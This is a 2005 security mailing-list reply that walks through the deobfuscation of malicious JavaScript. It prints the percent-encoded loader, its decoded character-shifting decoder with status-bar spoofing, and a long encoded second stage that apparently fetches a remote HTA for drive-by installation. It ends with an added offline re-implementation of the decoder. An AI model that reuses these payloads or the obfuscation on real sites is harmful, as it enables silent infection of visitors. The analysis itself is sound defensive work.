[Dshield] Help Needed With Dissection of Exploit

Valdis.Kletnieks@vt.edu Valdis.Kletnieks at vt.edu
Wed Aug 10 05:33:43 GMT 2005


On Wed, 10 Aug 2005 14:04:56 +1000, Nemo Omen said:

> 2) I don't know a whole lot about the javascript unescape function; what does
> it do?

It cleans up the % escapes

> 3) Are the %codes below machine opcodes or something else?

No, just hex codes - useful for embedding special chars into a URL.

> 4) What are the next steps in analysis of this malware?

Take it statement by statement:

> language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75
%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%
64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%6
2%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D
%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%
29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2
E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C
%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%
28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3
B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73
%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%
74%3E%0D%0A'));

The unescape returns (pretty printed for legibility):

<script language="javascript">
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)
    t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
self.focus();
setInterval("window.status='Google.com'",7);
}
</script>

It's a slightly more sophisticated decoder.  It defines dF, which takes a long
string as a parameter.  First we unescape the whole thing (all the %28 become
'(', and so on). Then the for loop builds a new string, where each ascii char
is the one 3 (the last char in the string) before the input string (so 'd'
becomes 'a', a '0' becomes a '-', and so on), then we unescape it again.

> dF('%286Fvw%7Coh%286H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286
E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286
Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%28
6FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%28
55%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh
%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH
%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfu
rooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286
G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286
D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%
7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad4
4%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G
%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%28
55%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2
857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853
YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%2
85%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%2
86Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%
288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%28
3%3C%283%3C%283%3C3')

Left as an exercise for the student. ;)
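The decoder walked through above (unescape, subtract the trailing digit from every character code, unescape again), re-implemented as an added example for offline analysis; this is not code from the original post, and the names decodeDF/encodeDF and the round-trip sample are mine. It returns the decoded text instead of calling document.write, so an analyst can read it without rendering it.

```javascript
// Added example (not from the original post): dF() re-implemented so the
// decoded text is returned rather than written into the document.

// Decode a dF()-style string: strip the trailing key digit, unescape,
// subtract the key from every character code, then unescape once more.
function decodeDF(s) {
  const key = Number(s.substr(s.length - 1, 1)); // the original coerces '3' via '-'
  const s1 = unescape(s.substr(0, s.length - 1)); // first pass: %28 -> '('
  let t = '';
  for (let i = 0; i < s1.length; i++) {
    t += String.fromCharCode(s1.charCodeAt(i) - key); // '(' -> '%', '6' -> '3', ...
  }
  return unescape(t); // second pass turns %3C etc. back into markup
}

// Inverse of decodeDF, used here only to build a constructed test input
// so the round trip can be checked without touching the real payload.
function encodeDF(plain, key) {
  const esc = escape(plain);
  let shifted = '';
  for (let i = 0; i < esc.length; i++) {
    shifted += String.fromCharCode(esc.charCodeAt(i) + key);
  }
  return escape(shifted) + String(key);
}

// The opening fragment of the quoted payload with the key '3' appended;
// worked by hand as described above, %286Fvw%7Coh%286H is '<style>'.
const FRAGMENT = '%286Fvw%7Coh%286H3';

// Constructed, harmless sample (not from the post) for a round-trip check.
const SAMPLE = '<b>hi</b>';

console.log(decodeDF(FRAGMENT));            // <style>
console.log(decodeDF(encodeDF(SAMPLE, 3))); // <b>hi</b>
```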

